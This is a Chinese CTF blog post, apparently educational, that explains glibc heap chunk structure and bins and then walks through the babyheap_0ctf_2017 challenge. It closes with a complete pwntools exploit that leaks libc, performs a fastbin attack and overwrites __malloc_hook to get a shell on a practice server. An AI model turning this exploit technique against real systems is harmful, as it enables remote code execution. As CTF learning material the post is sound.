<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="y1seco" />



<meta name="description" content="堆溢出">
<meta property="og:type" content="article">
<meta property="og:title" content="babyheap_0ctf_2017">
<meta property="og:url" content="https://y1seco.github.io/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/index.html">
<meta property="og:site_name" content="Y1secoのblog">
<meta property="og:description" content="堆溢出">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316131506363.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://raw.githubusercontent.com/y1seco/blog_image/master/img/202111150944434.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316134429623.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316135249139.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316133135882.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316135544629.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://raw.githubusercontent.com/y1seco/blog_image/master/img/202111150958166.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200316140527864.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201002095257731.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70#pic_center">
<meta property="article:published_time" content="2021-11-15T03:25:42.853Z">
<meta property="article:modified_time" content="2021-12-25T07:41:10.715Z">
<meta property="article:author" content="y1seco">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200316131506363.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Y1secoのblog" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>babyheap_0ctf_2017 | Y1secoのblog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: 
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kernel/" rel="tag">Kernel</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flask/" rel="tag">flask</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/leetcode/" rel="tag">leetcode</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" rel="tag">数据结构</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-堆溢出" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/" class="article-date">
      <time datetime="2021-11-15T03:25:42.853Z" itemprop="datePublished">2021-11-15</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      babyheap_0ctf_2017
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/pwn/">pwn</a>
    </div>


        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>堆溢出</p>
<span id="more"></span>

<h2 id="malloc-chunk的结构"><a href="#malloc-chunk的结构" class="headerlink" title="malloc_chunk的结构"></a>malloc_chunk的结构</h2><p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43847969/article/details/104897249">https://blog.csdn.net/weixin_43847969/article/details/104897249</a></p>
<p><img src="https://img-blog.csdnimg.cn/20200316131506363.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70"></p>
<p>pre_size:</p>
<p>这个参数分两种情况，一种情况记录大小，一种情况记录数据<br>当前一个chunk的状态是空闲时记录大小（也就是被free的时候），<br>当前一个chunk的状态不是空闲的时候，记录它的数据。<br>然后是</p>
<p>size：</p>
<p>就是这个chunk的大小,size的最后3个比特位对大小没有影响，但是要表示了一些东西<br>分别是non_main_arena :记录当前chunk是否属于主线程<br>is_mapped：当前chunk是否由mmap分配<br>prev_inuse：记录前一个chunk是否被分配（这个最重要，因为我们当这个参数为0时，我们能够通过它获得上一个chunk的大小和地址）</p>
<p>fd,bk:</p>
<p>表示用户数据，或者表示地址<br>chunk非空闲时，fd和bk存在的地方表示的是用户的数据，<br>chunk空闲时，fd存储下一个空闲的chunk，bk指向上一个空闲的chunk，这个非物理相邻表示的意思是，这个上一个和下一个表示的是被free的顺序，而不是地址上的相邻。</p>
<h2 id="chunk的结构"><a href="#chunk的结构" class="headerlink" title="chunk的结构"></a>chunk的结构</h2><p><img src="https://raw.githubusercontent.com/y1seco/blog_image/master/img/202111150944434.png" alt="在这里插入图片描述"></p>
<p>第一个是size of previous（前一个chunk的大小，如果前一个chunk空闲的话）<br>第二个size of chunk 当前chunk的大小，然后再末尾有3个比特位amp分别代表上面介绍过的3个参数<br>第三个就是存储数据的部分<br>然后就到了下一个chunk(next_chunk)，我们把这个next_chunk称为chunk2,上面的chunk称为chunk1，可以看到如果chunk1正在使用的话，那么chunk的头部位置，也就是prev_size，会被chunk1使用<br>然后chunk2的第二行的后三个比特位也分别是A01，A代表着是否属于主线程（这里我们不知道所以用A代替），0代表着当前chunk不是由mmap分配，1代表着前一个chunk已经被分配。</p>
<p>chunk被free后结构变化：</p>
<p><img src="https://img-blog.csdnimg.cn/20200316134429623.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>第一行,没变化，因为它是chunk1<br>第二行开始，M的位置变成了0，代表着chunk不是由mmap分配<br>第三行开始，原本存储数据的部分变成了forward pointer to next chunk in list<br>也就是fd，前面已经介绍过了，这个地方如果被使用的时候是数据，如果被free了，那么就存储的是下一个空闲的chunk，下面的back pointer to previous chunk in list（bk）同理.<br>然后就到了unused space，（maybe 0 bytes long），没有使用过的空间，这时候应该被收集到各种bin中去。<br>然后就到了chunk2,第一行记录当前chunk的大小，（并且不会被前一个chunk占用）<br>第二行记录前一个chunk的大小，并且末尾三位变成了A00,（这时候如果这个是堆中第一个被分配的chunk的话我们能通过prev_size字段获取上一个chunk的大小以及地址。）<br><img src="https://img-blog.csdnimg.cn/20200316135249139.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>chunk的空间复用：</p>
<p><img src="https://img-blog.csdnimg.cn/20200316133135882.png" alt="在这里插入图片描述"></p>
<h2 id="bin及分类"><a href="#bin及分类" class="headerlink" title="bin及分类"></a>bin及分类</h2><p><img src="https://img-blog.csdnimg.cn/20200316135544629.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="fast-bins"><a href="#fast-bins" class="headerlink" title="fast bins"></a>fast bins</h3><p><img src="https://raw.githubusercontent.com/y1seco/blog_image/master/img/202111150958166.png" alt="在这里插入图片描述"></p>
<h3 id="small-bins"><a href="#small-bins" class="headerlink" title="small bins"></a>small bins</h3><h3 id="large-bins"><a href="#large-bins" class="headerlink" title="large bins"></a>large bins</h3><h3 id="unsorted-bins"><a href="#unsorted-bins" class="headerlink" title="unsorted bins"></a>unsorted bins</h3><p>未被分类，刚被free未真的进入bin</p>
<p>Top Chunk</p>
<p><img src="https://img-blog.csdnimg.cn/20200316140527864.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h1 id="babyheap-0ctf-2017"><a href="#babyheap-0ctf-2017" class="headerlink" title="babyheap_0ctf_2017"></a>babyheap_0ctf_2017</h1><p>考点： fastbin attack</p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>两次 double free 与 fastbin attack 。<br>第一次先泄露 libc 地址，然后找到构造 fake chunk 的地址。<br>第二次通过构造的 fake chunk 堆溢出覆写 __malloc_hook 完成 get shell 。</p>
<h2 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h2><p>1、通过unsortedbin attack 来泄露libc地址</p>
<p>首先应该记住这样一条规律：当small chunk被释放时，它的fd、bk指向一个指针，这个指针指向top chunk地址，这个指针保存在main_arena的0x58偏移处，而main_arena是libc的data段中，是全局静态变量，所以偏移也是固定的，根据这些就可以计算出libc的基地址了，所以<em><strong>重点是当small chunk释放时，能读出fd 或者 bk的值</strong></em></p>
<p>我首先通过如下重叠两个块来泄漏libc的地址（也是常见的攻击）。<br><img src="https://img-blog.csdnimg.cn/20201002095257731.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">e = ELF(<span class="string">&#x27;./libc-2.23.so&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29370</span>)</span><br><span class="line"><span class="comment"># p = process(&#x27;./babyheap&#x27;)</span></span><br><span class="line">p.readuntil(<span class="string">&#x27;Command:&#x27;</span>)</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">a</span>):</span></span><br><span class="line">    p.writeline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Size:&#x27;</span>)</span><br><span class="line">    p.writeline(<span class="built_in">str</span>(a))</span><br><span class="line">    <span class="comment">#p.readuntil(&#x27;Command:&#x27;)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span>(<span class="params">a,b,c</span>):</span></span><br><span class="line">    p.writeline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Index:&#x27;</span>)</span><br><span class="line">    p.writeline(<span class="built_in">str</span>(a))</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Size:&#x27;</span>)</span><br><span class="line">    p.writeline(<span class="built_in">str</span>(b))</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Content:&#x27;</span>)</span><br><span class="line">    p.write(c)</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Command:&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">a</span>):</span>  </span><br><span class="line">    p.writeline(<span class="string">&#x27;3&#x27;</span>)   </span><br><span class="line">    p.readuntil(<span class="string">&#x27;Index:&#x27;</span>)</span><br><span class="line">    p.writeline(<span class="built_in">str</span>(a))</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Command:&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">a</span>):</span></span><br><span class="line">    p.writeline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.readuntil(<span class="string">&#x27;Index:&#x27;</span>)</span><br><span class="line">    p.writeline(<span class="built_in">str</span>(a))</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x18</span>) <span class="comment">#0</span></span><br><span class="line">alloc(<span class="number">0x18</span>) <span class="comment">#1</span></span><br><span class="line">alloc(<span class="number">0x68</span>) <span class="comment">#2</span></span><br><span class="line">alloc(<span class="number">0x68</span>) <span class="comment">#3</span></span><br><span class="line"></span><br><span class="line">update(<span class="number">0</span>, <span class="number">0x20</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(<span class="number">0x91</span>)) <span class="comment">#size1+size2</span></span><br><span class="line">dele(<span class="number">1</span>) <span class="comment">#1    #free1</span></span><br><span class="line">alloc(<span class="number">0x18</span>)   <span class="comment">#alloc1</span></span><br><span class="line">show(<span class="number">2</span>)     <span class="comment">#fd, bk at alloc2</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">libcbase = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x3c4b78</span></span><br><span class="line">log.info(<span class="built_in">hex</span>(libcbase))</span><br><span class="line">malloc_hook = libcbase + <span class="number">0x3c4aed</span></span><br><span class="line">log.info(<span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">one = libcbase + <span class="number">0x4526a</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">2</span>)  <span class="comment">#free2</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">update(<span class="number">1</span>, <span class="number">0x28</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(<span class="number">0x71</span>)+p64(malloc_hook))   <span class="comment">#fd at 2-&gt;malloc_hook</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x68</span>)  <span class="comment">#2</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">alloc(<span class="number">0x68</span>)  <span class="comment">#4 at malloc_hook</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">update(<span class="number">4</span>, <span class="number">0x1b</span>, p8(<span class="number">2</span>)*<span class="number">3</span>+p64(<span class="number">2</span>)*<span class="number">2</span>+p64(one))</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">alloc(<span class="number">255</span>) </span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>








      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/">babyheap_0ctf_2017</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2021-11-15, 11:25:42</p>
        <p><span>Updated:</span>2021-12-25, 15:41:10</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/" title="babyheap_0ctf_2017">https://y1seco.github.io/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/</a>
            <span class="copy-path" data-clipboard-text="From https://y1seco.github.io/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2021/11/16/%E6%A0%88%E6%BA%A2%E5%87%BA/">
                    栈溢出
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2021/11/11/ROP/">
                    CTF-WIKI-pwn-基本ROP 漏洞复现
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#malloc-chunk%E7%9A%84%E7%BB%93%E6%9E%84"><span class="toc-number">1.</span> <span class="toc-text">malloc_chunk的结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#chunk%E7%9A%84%E7%BB%93%E6%9E%84"><span class="toc-number">2.</span> <span class="toc-text">chunk的结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bin%E5%8F%8A%E5%88%86%E7%B1%BB"><span class="toc-number">3.</span> <span class="toc-text">bin及分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#fast-bins"><span class="toc-number">3.1.</span> <span class="toc-text">fast bins</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#small-bins"><span class="toc-number">3.2.</span> <span class="toc-text">small bins</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#large-bins"><span class="toc-number">3.3.</span> <span class="toc-text">large bins</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unsorted-bins"><span class="toc-number">3.4.</span> <span class="toc-text">unsorted bins</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#babyheap-0ctf-2017"><span class="toc-number"></span> <span class="toc-text">babyheap_0ctf_2017</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">1.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="toc-number">2.</span> <span class="toc-text">利用过程</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"babyheap_0ctf_2017　| Y1secoのblog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2021/11/16/%E6%A0%88%E6%BA%A2%E5%87%BA/" title="Pre: 栈溢出">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2021/11/11/ROP/" title="Next: CTF-WIKI-pwn-基本ROP 漏洞复现">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2022/03/03/BUUOJ%20PWN%20EXERCISE(%E4%B8%89%EF%BC%89/">BUUOJ PWN EXERCISE(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/27/CTFSHOW%E5%8D%B7%E7%8E%8B%E6%9D%AF-%20Incomplete%20Menu/">CTFSHOW卷王杯-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/27/gyctf_2020_force/">gyctf_2020_force</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/18/BUUCTF%20Pwn%20Exercise/">BUUCTF Pwn Exercise(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/17/%E3%80%90%E7%8E%8B%E9%81%93%E8%80%83%E7%A0%94%20%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%20%E3%80%91%E5%9F%BA%E7%A1%80%E7%AE%97%E6%B3%95%E4%BB%A3%E7%A0%81%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93%20C%E8%AF%AD%E8%A8%80(%E6%A0%91%E5%92%8C%E5%9B%BE%EF%BC%89/">数据结构基础代码总结（树和图）</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/13/flask%E9%85%8D%E7%BD%AE%E5%BC%82%E6%AD%A5%E4%BB%BB%E5%8A%A1/">flask配置celery异步任务</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/09/Kernel%20Pwn%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%80%EF%BC%89/">Kernel Pwn 学习（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/01/xdctf2015_pwn200/">xdctf2015_pwn200</a></li><li class="post-list-item"><a class="post-list-link" 